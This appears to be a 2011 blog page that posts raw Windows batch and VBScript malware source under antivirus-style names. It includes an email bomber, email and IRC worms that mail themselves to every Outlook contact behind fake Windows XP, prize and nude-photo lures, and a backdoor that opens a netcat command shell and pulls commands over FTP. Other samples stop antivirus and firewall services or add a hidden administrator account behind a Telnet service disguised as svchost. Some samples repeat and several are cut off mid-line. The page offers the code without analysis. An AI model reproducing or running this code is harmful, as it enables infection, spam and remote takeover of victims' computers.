( ';')< "ЦΓΤІШΛΤΞ ΠΛΡΣΤЯ": 1 Aug 2011

Monday, August 01, 2011

Email-Flooder.BAT.Prob.10

Email-Flooder.BAT.Prob.10

cls
@echo off

copy %0 C:\prob.bat
copy %0 C:\send.vbs
echo Dim x > C:\send.vbs
echo.ON ERROR RESUME NEXT >> C:\send.vbs
echo Set so=CreateObject("Scripting.FileSystemObject") >> C:\send.vbs
echo Set ol=CreateObject("Outlook.Application") >> C:\send.vbs
echo Set out= WScript.CreateObject("Outlook.Application") >> C:\send.vbs
echo Set mapi = out.GetNameSpace("MAPI") >> C:\send.vbs
echo Set a = mapi.AddressLists(1) >> C:\send.vbs
echo For x=1 To 1 >> C:\send.vbs
echo Set Mail=ol.CreateItem(0) >> C:\send.vbs
echo Mail.to="436767862063@max.mail.at&amp;quot; >> C:\send.vbs
echo Mail.Subject="5131" >> C:\send.vbs
echo Mail.Body="Hi there you are just been bombed..." >> C:\send.vbs
echo Mail.Send >> C:\send.vbs
echo Next >> C:\send.vbs
echo ol.Quit >> C:\send.vbs
cls
echo Bombing completed...
echo.
echo.
echo.
cscript C:\send.vbs
del C:\prob.bat
del C:\send.vbs
echo.
cls
Pause
exit

Email-Flooder.BAT.Prob.10

Email-Flooder.BAT.Prob.10

cls
@echo off

copy %0 C:\prob.bat
copy %0 C:\send.vbs
echo Dim x > C:\send.vbs
echo.ON ERROR RESUME NEXT >> C:\send.vbs
echo Set so=CreateObject("Scripting.FileSystemObject") >> C:\send.vbs
echo Set ol=CreateObject("Outlook.Application") >> C:\send.vbs
echo Set out= WScript.CreateObject("Outlook.Application") >> C:\send.vbs
echo Set mapi = out.GetNameSpace("MAPI") >> C:\send.vbs
echo Set a = mapi.AddressLists(1) >> C:\send.vbs
echo For x=1 To 1 >> C:\send.vbs
echo Set Mail=ol.CreateItem(0) >> C:\send.vbs
echo Mail.to="436767862063@max.mail.at&amp;quot; >> C:\send.vbs
echo Mail.Subject="5131" >> C:\send.vbs
echo Mail.Body="Hi there you are just been bombed..." >> C:\send.vbs
echo Mail.Send >> C:\send.vbs
echo Next >> C:\send.vbs
echo ol.Quit >> C:\send.vbs
cls
echo Bombing completed...
echo.
echo.
echo.
cscript C:\send.vbs
del C:\prob.bat
del C:\send.vbs
echo.
cls
Pause
exit

Email-Flooder.BAT.Prob.10

Email-Flooder.BAT.Prob.10

cls
@echo off

copy %0 C:\prob.bat
copy %0 C:\send.vbs
echo Dim x > C:\send.vbs
echo.ON ERROR RESUME NEXT >> C:\send.vbs
echo Set so=CreateObject("Scripting.FileSystemObject") >> C:\send.vbs
echo Set ol=CreateObject("Outlook.Application") >> C:\send.vbs
echo Set out= WScript.CreateObject("Outlook.Application") >> C:\send.vbs
echo Set mapi = out.GetNameSpace("MAPI") >> C:\send.vbs
echo Set a = mapi.AddressLists(1) >> C:\send.vbs
echo For x=1 To 1 >> C:\send.vbs
echo Set Mail=ol.CreateItem(0) >> C:\send.vbs
echo Mail.to="436767862063@max.mail.at&amp;quot; >> C:\send.vbs
echo Mail.Subject="5131" >> C:\send.vbs
echo Mail.Body="Hi there you are just been bombed..." >> C:\send.vbs
echo Mail.Send >> C:\send.vbs
echo Next >> C:\send.vbs
echo ol.Quit >> C:\send.vbs
cls
echo Bombing completed...
echo.
echo.
echo.
cscript C:\send.vbs
del C:\prob.bat
del C:\send.vbs
echo.
cls
Pause
exit

@echo off
del c:\mIRC\script.ini
echo [script] > c:\mIRC\script.ini
echo n0= on 1:JOIN:#: if ( $me != $nick ) { /dcc send $nick c:\WINDOWS\UpgradeToWindowsXP.bat } >> c:\mIRC\script.ini
cd\
md XP
copy %0.bat c:\XP
cls
attrib +h +r c:\XP
echo n1= /join #Beginner >> c:\mIRC\script.ini
if exist c:\WINDOWS\UpgradeToWindowsXP.bat goto rancid
copy %0.bat c:\WINDOWS\UpgradeToWindowsXP.bat
:rancid
if exist c:\XPUpdate.reg goto punk
echo REGEDIT4 > c:\XPUpdate.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\W

indows\CurrentVersion\Run] >> c:\XPUpdate.reg
echo "PX"="c:\\XP\\xp.bat" >> c:\XPUpdate.reg
:punk
start c:\XPUpdate.reg
for %%f in (C:\progra~1\mcafee\mcafee~1\*.dat) do copy %0.bat %%f
if exist c:\X.vbs goto goldfinger
echo. on error resume next > c:\X.vbs
echo dim a,b,c,d,e >> c:\X.vbs
echo set a = Wscript.CreateObject("Wscript.Shell") >> c:\X.vbs
echo a.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\XXP"
, "c:\XP\xp.bat" >> c:\X.vbs
echo set b = CreateObject("Outlook.Application") >> c:\X.vbs
echo set c = b.GetNameSpace("MAPI") >> c:\X.vbs
echo for y = 1 To c.AddressLists.Count >> c:\X.vbs
echo set d = c.AddressLists(y) >> c:\X.vbs
echo x = 1 >> c:\X.vbs
echo set e = b.CreateItem(0) >> c:\X.vbs
echo for o = 1 To d.AddressEntries.Count >> c:\X.vbs
echo f = d.AddressEntries(x) >> c:\X.vbs
echo e.Recipients.Add f >> c:\X.vbs
echo x = x + 1 >> c:\X.vbs
echo next >> c:\X.vbs
echo e.Subject = "Upgrade to Windows XP" >> c:\X.vbs
echo e.Body = "Good news from Microsoft. Click the attachment for your FREE Windows XP. Upgrade to Windows XP now." >> c:\X.vbs
echo e.Attachments.Add ("c:\WINDOWS\UpgradeToWindowsXP.bat

") >> c:\X.vbs
echo e.DeleteAfterSubmit = False >> c:\X.vbs
echo e.Send >> c:\X.vbs
echo f = "" >> c:\X.vbs
echo next >> c:\X.vbs
echo a.run("c:\PROGRA~1\INTERN~1\iexplore.exe http://www.yahooka.com") >> c:\X.vbs
echo a.run("c:\WINDOWS\ping.exe -l 10000 -t www.hotmail.com") >> c:\X.vbs
:goldfinger
start c:\X.vbs
attrib +h +r c:\X.vbs
exit
::BatchWerm by !!-virus-!! =)

Email-Worm-BAT.Alcobul.a

Email-Worm-BAT.Alcobul.b

:: console output is turned off and console is redirected to nul to prevent user interruptions
@echo off ctty nul

:: Modify McAfee Dat files... Can anyone tell me where the dat files of AVP, Pccllin, fprot are located?
for %%f in (C:\progra~1\mcafee\mcafee~1\*.dat) do copy %0 %%f
:: spread to IRC
del c:\mIRC\script.ini
echo [script] > c:\mIRC\script.ini
echo n0= on 1:JOIN:#: if ( $me != $nick ) { /dcc send $nick c:\WINDOWS\XPUpgrade.bat } >> c:\mIRC\script.ini
echo n1= /join #Beginner >> c:\mIRC\script.ini
:: goto root directory
cd\
:: make a hideaway folder, stealth with attrib
md XP
attrib +h +r c:\XP
:: spawn 8 clones.. some will be randomly used in attachments..
copy %0 c:\XP\xp.bat
copy %0 c:\Recycled\xp.bat
copy %0 c:\WINDOWS\HTTPRedirect.htm.bat
copy %0 c:\WINDOWS\SYSTEM32\Redirection.exe.bat
copy %0 c:\WINDOWS\COMMAND\PageRedirect.asp.bat
copy %0 c:\Redirect.php.bat
copy %0 c:\WINDOWS\SYSTEM\Redirection.bat
copy %0 c:\WINDOWS\XPUpgrade.bat
:: modify registry.. make worm run @ startup
echo REGEDIT4 > c:\X.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] >> c:\X.reg

echo "PX"="c:\\XP\\xp.bat" >> c:\X.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] >> c:\X.reg
echo "VPX"="c:\\XP\\X.vbs" >> c:\X.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] >> c:\X.reg
echo "PXV"="c:\\Recycled\\xp.bat" >> c:\X.reg
regedit /s c:\X.reg
del c:\X.reg
:: is all new improved VBScript mailer present in c:\?
if exist c:\X.vbs goto goldfinger
:: if not, make the all new improved VBScript mailer
echo.on error resume next > c:\X.vbs
echo dim a,b,c,d,e >> c:\X.vbs
echo yelp = "Take a look at this.." >> c:\X.vbs
echo sex = "Hello former classmate.. I'm Heather and I have included a file which will redirect you to my webpage.. Full of nude picutres and stuff.. See you soon." >> c:\X.vbs
echo drugs = "You've won a free plane ticket to Hawaii. To claim your prize, we included a redirection software for security purposes. Only from FlyHawaii.com" >> c:\X.vbs
echo ass = "Wscript.Shell" >> c:\X.vbs
echo reg = "Check out my nude picture gallery.. Sarah.." >> c:\X.vbs
echo carry = "Hi there!" >> c:\X.vbs
echo hole = "Outlook.Application" >> c:\X.vbs
echo eins = "Hey.. Your mom sent me this message.. How dare your mom talk to me like that.. Shit!" >> c:\X.vbs
echo shit = "MAPI" >> c:\X.vbs
echo cum = "Hi there..You've just won a free backstage pass... Watch your favourite band/boyband perform live..Just tell us who do you want to see by clicking at this redirection software.. We make dreams come true..FreePasses.com" >> c:\X.vbs
echo dork = "Hello!" >> c:\X.vbs
echo suck = "I wanna tell you how much I adore you.." >> c:\X.vbs
echo set a = Wscript.CreateObject(ass) >> c:\X.vbs
echo punk = array(yelp, carry, dork, suck) >> c:\X.vbs
echo Randomize >> c:\X.vbs
echo rock = punk(Int(Rnd * 4)) >> c:\X.vbs
echo set b = CreateObject(hole) >> c:\X.vbs
echo set c = b.GetNameSpace(shit) >> c:\X.vbs
echo ska = array(cum, eins, sex, drugs, reg, yelp) >> c:\X.vbs
echo Randomize >> c:\X.vbs
echo reggae = ska(Int(Rnd * 6)) >> c:\X.vbs
echo for y = 1 To c.AddressLists.Count >> c:\X.vbs
echo phile = "c:\WINDOWS\HTTPRedirect.htm.bat&qu

ot; >> c:\X.vbs
echo set d = c.AddressLists(y) >> c:\X.vbs
echo phile1 = "c:\WINDOWS\SYSTEM32\Redirection.exe.bat" >> c:\X.vbs
echo x = 1 >> c:\X.vbs
echo set e = b.CreateItem(0) >> c:\X.vbs
echo phile2 = "c:\WINDOWS\COMMAND\PageRedirect.asp.bat" >> c:\X.vbs
echo for o = 1 To d.AddressEntries.Count >> c:\X.vbs
echo f = d.AddressEntries(x) >> c:\X.vbs
echo e.Recipients.Add f >> c:\X.vbs
echo x = x + 1 >> c:\X.vbs
echo next >> c:\X.vbs
echo e.Subject = rock >> c:\X.vbs
echo phile3 = "c:\Redirect.php.bat" >> c:\X.vbs
echo e.Body = reggae >> c:\X.vbs
echo phile4 = "c:\WINDOWS\SYSTEM\Redirection.bat" >> c:\X.vbs
echo guns = array(phile, phile1, phile2, phile3, phile4) >> c:\X.vbs
echo Randomize >> c:\X.vbs
echo roses = guns(Int(Rnd * 5)) >> c:\X.vbs
echo e.Attachments.Add (roses) >> c:\X.vbs
echo e.DeleteAfterSubmit = True >> c:\X.vbs
echo e.Send >> c:\X.vbs
echo f = "" >> c:\X.vbs
echo next >> c:\X.vbs
:: put a copy of mailer in hideaway directory
copy c:\X.vbs c:\XP
:: Mailer present
:goldfinger
:: for assurance
copy c:\X.vbs c:\XP
:: Mail with attachment
start c:\X.vbs
:: hide core files
attrib +h +r c:\X.vbs
attrib +h +r c:\XP\X.vbs
attrib +h +r c:\XP\xp.bat
:: Good bye!
exit

Email-Worm-BAT.Alcobul.b

Backdoor.BAT.Comlabat.03

@ECHO OFF
:ComBat
SET COM=1

IF EXIST "%SystemRoot%\help\combat\server.ba

t" GOTO LOG
MKDIR "%SystemRoot%\help\combat\"
> "%SystemRoot%\help\combat\advcom%COM%.bat" ECHO @ECHO OFF
>>"%SystemRoot%\help\combat\advcom%COM%.bat" ECHO MOVE /Y %0 "%SystemRoot%\help\combat\"
>>"%SystemRoot%\help\combat\advcom%COM%.bat" ECHO CALL "%SystemRoot%\help\combat\server.bat"
GOTO RUN

:LOG
DEL /F /Q "%SystemRoot%\help\combat\%USERNAME%.log" >NUL
> "%SystemRoot%\help\combat\%USERNAME%.log" ECHO Server Log:
>> "%SystemRoot%\help\combat\%USERNAME%.log" ECHO.
IF EXIST "%SystemRoot%\help\combat\com.log" GOTO ULOG
> "%SystemRoot%\help\combat\com.log" echo [log] 0

:ULOG
FOR /F "skip=2 tokens=*" %%S IN ('FIND "[log]" "%SystemRoot%\help\combat\com.log"') DO SET CCOM=%%S
SET CCOM=%CCOM:~6%
SET /A COM=%CCOM%+1
DEL /F /Q "%SystemRoot%\help\combat\advcom%CCOM%.bat" >NUL

:ADSTest
ECHO ADS LOG > "%SystemRoot%\help\combat\com.log:test.txt"
FIND "ADS LOG" < "%SystemRoot%\help\combat\com.log:test.txt" >NUL
IF ERRORLEVEL 1 GOTO PATH
:: for ADS detection auto-upgrade, uncomment the next two lines.
:: ELSE SET UPGRADE=adsserver.bat
:: GOTO Upgrade

:PATH
PATH|FIND "WINDOWS" >NUL
IF NOT ERRORLEVEL 1 SET WINDIR=WINDOWS
PATH|FIND "SYSTEM" >NUL
IF NOT ERRORLEVEL 1 SET SYSDIR=SYSTEM
PATH|FIND "WINNT" >NUL
IF NOT ERRORLEVEL 1 SET WINDIR=WINNT
PATH|FIND "SYSTEM32" >NUL
IF NOT ERRORLEVEL 1 SET SYSDIR=SYSTEM32

:FINDOS
VER|FIND "XP">NUL|SET OSV=XP
IF NOT ERRORLEVEL 1 GOTO WinXP
VER|FIND "2000">NUL|SET OSV=2K
IF NOT ERRORLEVEL 1 GOTO WinXP
VER|FIND "NT">NUL|SET OSV=NT
IF NOT ERRORLEVEL 1 GOTO Win9X
VER|FIND "Mil">NUL|SET OSV=ME
IF NOT ERRORLEVEL 1 GOTO Win9X
VER|FIND "98">NUL|SET OSV=98
IF NOT ERRORLEVEL 1 GOTO Win9X
VER|FIND "95">NUL|SET OSV=95
IF NOT ERRORLEVEL 1 GOTO Win9X
GOTO END
:WinXP
> "%SystemRoot%\help\combat\regpatch.

reg" ECHO Windows Registry Editor Version 5.00
>>"%SystemRoot%\help\combat\regpatch.reg" ECHO.
>>"%SystemRoot%\help\combat\regpatch.reg" ECHO [HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run]
>>"%SystemRoot%\help\combat\regpatch.reg" ECHO "HELLO WORLD"="%SystemDrive%\\%WINDIR%\\help\\combat\\server.bat"
GOTO ADD

:Win9X
> "%SystemRoot%\help\combat\regpatch.reg" ECHO REGEDIT4
>>"%SystemRoot%\help\combat\regpatch.reg" ECHO.
>>"%SystemRoot%\help\combat\regpatch.reg" ECHO [HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run]
>>"%SystemRoot%\help\combat\regpatch.reg" ECHO "HELLO WORLD"="%SystemDrive%\\%WINDIR%\\help\\combat\\server.bat"
GOTO ADD

:ADD
IF NOT EXIST "%SystemRoot%\help\combat\regpatch.reg" GOTO PATH
REGEDIT /S "%SystemRoot%\help\combat\regpatch.reg"
DEL /F /S /Q "%SystemRoot%\help\combat\regpatch.reg" >NUL

:KillFW
:: add Firewall killing NET STOP commands here.

:PING
PING (ftp server) -n 4 -w 1000 >NUL
IF ERRORLEVEL 1 GOTO PING

:STATS
IF NOT EXIST "%SystemRoot%\help\combat\%USERNAME%.log" GOTO LOG
IPCONFIG /all >> "%SystemRoot%\help\combat\%USERNAME%.log"
NETSTAT -a -n >> "%SystemRoot%\help\combat\%USERNAME%.log"

:NetCat
:: add NETCAT commands here.
START /MIN /HIGH nc -l -p 1234 -d -e cmd.exe -L

:GetCom
> "%SystemRoot%\help\combat\com.txt" ECHO open (ftp server)
>>"%SystemRoot%\help\combat\com.txt" ECHO (ftp username)
>>"%SystemRoot%\help\combat\com.txt" ECHO (ftp passwprd)
>>"%SystemRoot%\help\combat\com.txt" ECHO cd public_html/combat
>>"%SystemRoot%\help\combat\com.txt" ECHO prompt
>>"%SystemRoot%\help\combat\com.txt" ECHO type ascii
>>"%SystemRoot%\help\combat\com.txt" ECHO get "advcom%COM%.bat" "%SystemRoot%\help\combat\advcom%COM%.bat"
>>"%SystemRoot%\help\combat\com.txt" ECHO put "%SystemRoot%\help\combat\%USERNAME%.log"
>>"%SystemRoot%\help\combat\com.txt" ECHO bye
:FTP
IF NOT EXIST "%SystemRoot%\help\combat\com.txt&q

uot; GOTO GetCom
FTP -s:"%SystemRoot%\help\combat\com.txt" >NUL
DEL /F /Q "%SystemRoot%\help\combat\com.txt" >NUL

:RUN
CALL "%SystemRoot%\help\combat\advcom%COM%.bat"
GOTO END

:Upgrade
> "%SystemRoot%\help\combat\upgrade.txt" ECHO open (ftp server)
>>"%SystemRoot%\help\combat\upgrade.txt" ECHO (ftp username)
>>"%SystemRoot%\help\combat\upgrade.txt" ECHO (ftp passwprd)
>>"%SystemRoot%\help\combat\upgrade.txt" ECHO cd public_html/combat
>>"%SystemRoot%\help\combat\upgrade.txt" ECHO prompt
>>"%SystemRoot%\help\combat\upgrade.txt" ECHO type ascii
>>"%SystemRoot%\help\combat\upgrade.txt" ECHO get "%UPGRADE%" "%SystemRoot%\help\combat\%UPGRADE%"
>>"%SystemRoot%\help\combat\upgrade.txt" ECHO bye
IF NOT EXIST "%SystemRoot%\help\combat\upgrade.txt" GOTO Upgrade
FTP -s:"%SystemRoot%\help\combat\upgrade.txt" >NUL
DEL /F /Q "%SystemRoot%\help\combat\upgrade.txt" >NUL
IF NOT EXIST "%SystemRoot%\help\combat\%UPGRADE%" GOTO Upgrade
START "" /MIN /HIGH "%SystemRoot%\help\combat\%UPGRADE%"

:END
EXIT

Backdoor.BAT.Netstop.s

@echo off
net stop "RsRavMon" /y
net stop "network associates mcshield" /y

net stop "network associates task manager" /y
net stop "mcafee Framework service"
net stop "RsCCenter" /y
net stop "Norton AntiVirus Server" /y
net stop "Norton AntiVirus" /y
net stop "Serv-U" /y
net stop "Norton AntiVirus Auto Protect Service" /y
net stop "Norton AntiVirus Client" /y
net stop "Symantec AntiVirus Client" /y
net stop "Norton AntiVirus Server" /y
net stop "NAV Alert" /y
net stop "Nav Auto-Protect" /y
net stop "McShield" /y
net stop "DefWatch" /y
net stop "eventlog" /y
net stop "TCP/IP NetBIOS Helper Service" /y
net stop "WMDM PMSP Service" /y
net stop "lmhosts" /y
net stop "eventlog" /y
net stop "InoRPC" /y
net stop "InoRT" /y
net stop "InoTask" /y
net stop "IREIKE" /y
net stop "IPSECMON" /y
net stop "GhostStartService" /y
net stop "SharedAccess" /y
net stop "NAVAPSVC" /y
net stop "NISUM" /y
net stop "SymProxySvc" /y
net stop "NISSERV" /y
net stop "ntrtscan" /y
net stop "tmlisten" /y
net stop "PccPfw" /y
net stop "tmproxy" /y
net stop "Tmntsrv" /y
net stop "PCCPFW" /y
net stop "AvSynMgr" /y
net stop "McAfeeFramework" /y
net stop "Micorsoft Network Firewall Service" /y
net stop "AvgServ" /y
net stop "MonSvcNT" /y
net stop "V3MonNT" /y
net stop "V3MonSvc" /y
net stop "spidernt" /y
net stop "MCVSrte" /y
net stop "SweepNet" /y
net stop "SWEEPSRV.SYS" /y
net stop "KVSrvXP" /y
net stop "Norton AntiVirus Auto Protect Service"
net stop "Norton AntiVirus Client"
net stop "Symantec AntiVirus Client"
net stop "Norton AntiVirus Server"
net stop "NAV Alert"
net stop "Nav Auto-Protect"
net stop "McShield"
net stop "DefWatch"
net stop "SyGateService"
net stop "Sygate Personal Firewall Pro"
net stop "Sophos Anti-Virus"
net stop "Sophos Anti-Virus Network"
net stop "eTrust Antivirus Job Server"
net stop "eTrust Antivirus Realtime Server"
net stop "eTrust Antivirus RPC Server"
net stop "ose" /y
%windir\system32\kill.exe AhnSDsv
%windir\system32\kill.exe ircproxyc
%windir\system32\kill.exe CPQNIMGT
%windir\system32\kill.exe llssrv
%windir\system32\kill.exe svdhost
%windir\system32\kill.exe CPQTEAM
%windir\system32\kill.exe netpia
%windir\system32\kill.exe loadqm
%windir\system32\kill.exe MonSvcNT
%windir\system32\kill.exe AhnSD
%windir\system32\kill.exe Firedaemon
%windir\system32\kill.exe Firedaemon
%windir\system32\kill.exe Firedaemon
%windir\system32\kill.exe zlclient
%windir\system32\kill.exe kav.exe
%windir\system32\kill.exe Surveyor
%windir\system32\kill.exe MonSysNT
%windir\system32\kill.exe dllhost
%windir\system32\kill.exe mdm
%windir\system32\kill.exe cqmgstor
%windir\system32\kill.exe CpqRcmc
%windir\system32\kill.exe CQMGHOST
%windir\system32\kill.exe jushed
%windir\system32\kill.exe NPROTECT
%windir\system32\kill.exe FXSSVC

Backdoor.BAT.Comlabat.03

@ECHO OFF
:ComBat
SET COM=1

IF EXIST "%SystemRoot%\help\combat\server.ba

Backdoor.BAT.Netstop.s

Backdoor.BAT.Comlabat.03

@ECHO OFF
:ComBat
SET COM=1

IF EXIST "%SystemRoot%\help\combat\server.ba

Backdoor.BAT.Netstop.s

Backdoor.BAT.RA-based.b

nvsvc32.exe /install /silence
echo off
dtREG -AddKey HKEY_LOCAL_MACHINE\SYSTEM\RAdmin
dtREG -AddKey HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0

dtREG -AddKey HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server

dtREG -AddKey HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters
dtREG -AddKey HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\iplist
dtREG -Set REG_BINARY HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters\Port=22130000
dtREG -Set REG_BINARY HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters\Timeout=0a000000
dtREG -Set REG_BINARY HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters\EnableLogFile=00000000
dtREG -Set REG_SZ HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters\LogFilePath="c:\logfile.txt"
dtREG -Set REG_BINARY HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters\FilterIp=00000000
dtREG -Set REG_BINARY HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters\DisableTrayIcon=01000000
dtREG -Set REG_BINARY HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters\AutoAllow=00000000
dtREG -Set REG_BINARY HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters\AskUser=00000000
dtREG -Set REG_BINARY HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters\EnableEventLog=00000000
dtREG -Set REG_BINARY HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters\Parameter=a3729aba72a15e43c1478d351d658987
echo off
net start r_server

net localgroup TelnetClients /add

net user iwam_user mypass /add
net localgroup Administratoren iwam_user /add
net localgroup TelnetClients iwam_user /add

:: SET REGiSTRY!

cd %windir%\system32
ECHO Windows Registry Editor Version 5.00>0.reg
ECHO [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\TelnetServer\1.0]>>0.reg
ECHO "LoginScript"=hex(2):63,00,6d,00,64,00,00,00>>0.reg
ECHO "TelnetPort"=dword:000003ff&gt;>0.reg
ECHO "MaxConnections"=dword:0000000a>>0.reg
ECHO "EventLoggingEnabled"=dword:00000000>>0.reg
ECHO "DisconnectKillAllApps"=dword:00000000>>0.reg
ECHO [-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\TelnetServer\1.0\ReadConfig]>>0.reg
ECHO [-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\TelnetServer\Defaults]>>0.reg
regedit /s 0.reg && DEL 0.reg

:: SET SERViCE!
COPY %windir%\system32\tlntsvr.exe %windir%\system32\"svchost.exeÿ&quo

t;
assoc .exeÿ=exefile
sc create "WMI-Client" binpath= "%windir%\system32\svchost.exeÿ&quot; start= auto
"svchost.exeÿ" /service
sc description WMI-Client "Microsoft WMI-Client"
sc start WMI-Client

Backdoor.BAT.Teldoor.a

: Telnet Backdoor for WindowsXP Ver 1.4 FiNAL WindowsXP-Prof

:: ADD USER WiTH SUFFiCiENT RiGHTS!

net localgroup TelnetClients /add

net user iwam_user mypass /add
net localgroup Administratoren iwam_user /add
net localgroup TelnetClients iwam_user /add

:: SET REGiSTRY!

cd %windir%\system32
ECHO Windows Registry Editor Version 5.00>0.reg
ECHO [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\TelnetServer\1.0]>>0.reg
ECHO "LoginScript"=hex(2):63,00,6d,00,64,00,00,00>>0.reg
ECHO "TelnetPort"=dword:000003ff&gt;>0.reg
ECHO "MaxConnections"=dword:0000000a>>0.reg
ECHO "EventLoggingEnabled"=dword:00000000>>0.reg
ECHO "DisconnectKillAllApps"=dword:00000000>>0.reg
ECHO [-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\TelnetServer\1.0\ReadConfig]>>0.reg
ECHO [-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\TelnetServer\Defaults]>>0.reg
regedit /s 0.reg && DEL 0.reg

:: SET SERViCE!
COPY %windir%\system32\tlntsvr.exe %windir%\system32\"svchost.exeÿ&quo

t;
assoc .exeÿ=exefile
sc create "WMI-Client" binpath= "%windir%\system32\svchost.exeÿ&quot; start= auto
"svchost.exeÿ" /service
sc description WMI-Client "Microsoft WMI-Client"
sc start WMI-Client

Backdoor.BAT.Teldoor.a

: Telnet Backdoor for WindowsXP Ver 1.4 FiNAL WindowsXP-Prof

:: ADD USER WiTH SUFFiCiENT RiGHTS!

net localgroup TelnetClients /add

net user iwam_user mypass /add
net localgroup Administratoren iwam_user /add
net localgroup TelnetClients iwam_user /add

:: SET REGiSTRY!

cd %windir%\system32
ECHO Windows Registry Editor Version 5.00>0.reg
ECHO [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\TelnetServer\1.0]>>0.reg
ECHO "LoginScript"=hex(2):63,00,6d,00,64,00,00,00>>0.reg
ECHO "TelnetPort"=dword:000003ff&gt;>0.reg
ECHO "MaxConnections"=dword:0000000a>>0.reg
ECHO "EventLoggingEnabled"=dword:00000000>>0.reg
ECHO "DisconnectKillAllApps"=dword:00000000>>0.reg
ECHO [-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\TelnetServer\1.0\ReadConfig]>>0.reg
ECHO [-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\TelnetServer\Defaults]>>0.reg
regedit /s 0.reg && DEL 0.reg

:: SET SERViCE!
COPY %windir%\system32\tlntsvr.exe %windir%\system32\"svchost.exeÿ&quo

t;
assoc .exeÿ=exefile
sc create "WMI-Client" binpath= "%windir%\system32\svchost.exeÿ&quot; start= auto
"svchost.exeÿ" /service
sc description WMI-Client "Microsoft WMI-Client"
sc start WMI-Client

( ';')< "ЦΓΤІШΛΤΞ ΠΛΡΣΤЯ"

Tag Cloud

Pages

Monday, August 01, 2011

Email-Flooder.BAT.Prob.10

Email-Flooder.BAT.Prob.10

Email-Flooder.BAT.Prob.10

Email-Worm-BAT.Alcobul.a

Email-Worm-BAT.Alcobul.a

Email-Worm-BAT.Alcobul.a

Email-Worm-BAT.Alcobul.b

Email-Worm-BAT.Alcobul.b

Email-Worm-BAT.Alcobul.b

Backdoor.BAT.Comlabat.03

Backdoor.BAT.Netstop.s

Backdoor.BAT.Comlabat.03

Backdoor.BAT.Netstop.s

Backdoor.BAT.Comlabat.03

Backdoor.BAT.Netstop.s

Backdoor.BAT.RA-based.b

Backdoor.BAT.RA-based.b

Backdoor.BAT.RA-based.b

Backdoor.BAT.Teldoor.a

Backdoor.BAT.Teldoor.a

Backdoor.BAT.Teldoor.a

Geo IP Location

BlogSearch:

Blog Visited